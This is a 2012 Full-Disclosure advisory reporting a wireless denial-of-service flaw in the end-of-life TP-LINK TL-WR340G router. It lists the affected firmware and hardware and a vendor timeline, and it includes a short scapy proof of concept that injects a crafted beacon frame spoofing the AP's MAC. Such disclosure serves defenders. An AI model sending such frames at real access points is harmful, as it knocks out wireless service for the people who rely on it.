TP-LINK TL-WR340G Wireless Denial of Service

["Adam P." <ziherung.pl () gmail com>]

=== intro ===

TP-LINK TL-WR340G is a SOHO router with integrated IEEE 802.11b/g AP. 
Now it's marked End-of-Life.

Transmitting crafted frames in proximity of working router cause device 
to malfunction. Wireless communication stops,  existing clients don't 
receive frames from AP ( except beacons ), new clients can't connect.


=== details ===

Affected product: TL-WR340G Wireless router
Firm Version:  4.7.11  Build 101102 Rel.60376n
Hardware Version: WR340G v3
Local/remote: Local ( wirelessly )

Vulnerability can be spotted by crafting and transmitting frame with scapy:

> > fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP 
MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()
> > sendp(fr,iface="injection capable wireless interface",count=5)

Attacker could cease wireless traffic. To resume AP functionality user 
must restart wireless interface in WebGUI or restart device.


=== time-line ===
2.08.2012 - vendor notified
4.09.2012 - no response from vendor, published

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/